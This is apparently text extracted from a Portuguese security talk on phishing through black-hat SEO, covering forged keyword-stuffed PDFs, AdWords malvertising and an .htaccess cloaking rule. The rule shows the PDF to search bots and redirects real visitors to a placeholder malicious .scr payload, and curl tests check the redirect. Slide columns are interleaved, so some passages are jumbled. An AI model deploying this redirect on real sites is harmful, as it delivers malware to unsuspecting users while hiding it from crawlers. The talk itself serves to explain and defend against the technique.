Phishing através de táticas
BL4CK H4T SEO
O Novo Arsenal Phisher
0x27null@phishing:~$ php wh0am1.php [ + ] Nome: [ + ] E-mail: [ + ] Twitter: [ + ] Blog: [ + ] GIT: [ + ] Especialidade:
Cleiton Pinheiro
[email protected] @0x27null http://blog.0x27null.com https://github.com/googleinurl GED - Gambiarras Exploits Dorking -------------------------------------------------------------------------------------------3ntus14st4 3m $3gur4nç4 d4 1nf0rm4çã0, Cr14d0r d0 grup0 INURL BRASIL, D3s3nv0lv3d0r PHP / C#. 47u4lm3n73 7r4b4lh4 n4 3mpr3$4 El Pescador d0 grup0 Tempest. --------------------------------------------------------------------------------------------
Forjando documento PDF
Forjando documento PDF
D0CUM3NT0 PDF
OCR Optical Character Recognition
Forjando documento PDF
Forjando documento PDF
Forjando documento PDF
Forjando documento PDF
F0RG3D PDF
ESTRUTURA - PDF OUTPUT
O intuito do criminoso é ter em seus arquivos forjados o máximo possível de palavras chaves vinculadas ao “público alvo”. 1. 2. 3. 4. 5. 6.
{imagem} {título randômico} - {data atual} {palavras chaves randômicas} {palavras chaves hashtag randômicas} {texto complementar } {palavras chaves formato links}
O lado do phisher
S3RVER S1DE
ARQU1VO .htaccess MOD1FICADO
Para “hackear ” de forma
expressiva e também RewriteEngine on RewriteCond %{HTTP_USER_AGENT} !(Googlebot |bingbot|Yahoo) garante o acesso das RewriteRule (.+\.pdf)$ http://www.sitemalicioso2.uk/exploit-pdf.scr [R=301,L] vítimas a suas (URL’S || arquivos maliciosos), O # TE5TE R3QUEST: criminoso pode refinar o 0x27null@phishing :~$ curl localhost/teste/Carro.pdf -v | grep '301' # RETURN HTTP HEADER: arquivo .htaccess de < HTTP/1.1 301 Moved Permanently forma que o Bot de < Server: Apache/2.4.12 (Ubuntu) indexação (Web crawler) < Location: http://www.sitemalicioso2.uk/exploit-pdf.scr tenha acesso ao seu # TE5TE R3QUEST / SE7 USER-AGENT BOT: 0x27null@phishing :~$ curl -I localhos/tteste/Carro.pdf -v --user-agent \ conteúdo, mas não o 'XX/5.0(compatible;Googlebot/2.1;+http://www.google.com/bot.html)' -v | grep --color \ usuário alvo pois o 'pdf' # RETURN HTTP HEADER: mesmo é direcionado < HTTP/1.1 200 OK para site de terceiros. < Server: Apache/2.4.12 (Ubuntu) < Content-Type: application/pdf)
Relação de confiança
600gl3 AdWord5
Alcance potencial diário
1K cliques
57K impressões
Anúncio
Relação de confiança
BUSC4 1NF3CTAD4
R3SULTADO ORGÂNICO
R3SULTADO PATROCINADO
É uma exploração de relação de confiança entre usuário e seu aplicativo web “favorita”, pois ele não vai oferecer o conteúdo “carros usados”,
Infográfico
R3FERÊNC1A5
●
●
https://www.elpescador.com.br/blog/index.php/phishing-engenharia-social-entenda-porque-essas-tecnica
http://dompdf.github.com
●
https://support.google.com/drive/answer/176692?hl=pt-BR
●
https://scholar.google.com.br/intl/pt-BR/scholar/publishers.html#tech2
●
https://www.elpescador.com.br/blog/index.php/quatro-fatos-que-explicam-porque-o-phishing-e-a-maior-arma-do-cibercrime
●
https://support.google.com/webmasters/answer/6001181?hl=pt-br
●
http://httpd.apache.org/docs/2.2/pt-br/howto/htaccess.html
●
https://www.rapid7.com/db/modules/exploit/windows/fileformat/adobe_pdf_embedded_exe
●
https://www.offensive-security.com/metasploit-unleashed/client-side-exploits
●
https://www.offensive-security.com/metasploit-unleashed/msfconsole
●
https://www.elpescador.com.br/blog/index.php/games-online-um-campo-minado-de-phishing
●
https://www.facebook.com/business/products/ads
●
https://support.google.com/webmasters/answer/1061943?hl=pt-BR
●
https://blog.malwarebytes.org/mobile-2/2013/12/android-pop-ups-warn-of-infection
●
https://www.microsoft.com/en-us/security/pc-security/antivirus-rogue.aspx
●
https://www.elpescador.com.br/blog/index.php/phishing-engenharia-social-entenda-porque-essas-tecnicas-estao-interligadas
●
http://g1.globo.com/tecnologia/blog/seguranca-digital/post/golpe-com-falsa-tela-azul-da-morte-e-veiculado-em-anuncios-na-web.html
●
https://blog.malwarebytes.org/fraud-scam/2015/09/malvertising-via-google-adwords-leads-to-fake-bsod
●
http://www.agenciamestre.com/seo/link-farm
●
http://help.adobe.com/livedocs/acrobat_sdk/10/Acrobat10_HTMLHelp/wwhelp/wwhimpl/common/html/wwhelp.htm?context=Acrobat10_SDK_HTMLHelp&file=JS_Dev_Overview.71.1.html
●
http://partners.adobe.com/public/developer/en/acrobat/sdk/AcroJSGuide.pdf
●
https://dl.packetstormsecurity.net/1411-exploits/googledoubleclick-redirect.txt
●
https://support.google.com/analytics/answer/1033981
0x27null@phishing:~$ php c0n7a7o.php [ + ] Nome: [ + ] E-mail: [ + ] Twitter: [ + ] Blog: [ + ] GIT: [ + ] Especialidade:
Cleiton Pinheiro
[email protected] @0x27null http://blog.0x27null.com https://github.com/googleinurl GED - Gambiarras Exploits Dorking ------------------------------------------------------------------------------------------0x27null@phishing:~$ POF=$(Z=`echo '6964' | xxd -r -p`;$Z;Y=`echo '637572696F73697479206B696C6C65642074686520636174' | xxd -r -p`;echo $Y;W=`echo '202045723420756d342076337a20756d20703435356172302078346d61646f20636f72756a342e2e20456c3320666f31207630617 2206e6f203376656e746f2063346d7075732070347274792e2e206520636169752064652063617234206e302058346f2e202d2d2 0462049204d' | xxd -r -p`;echo $W);echo $POF;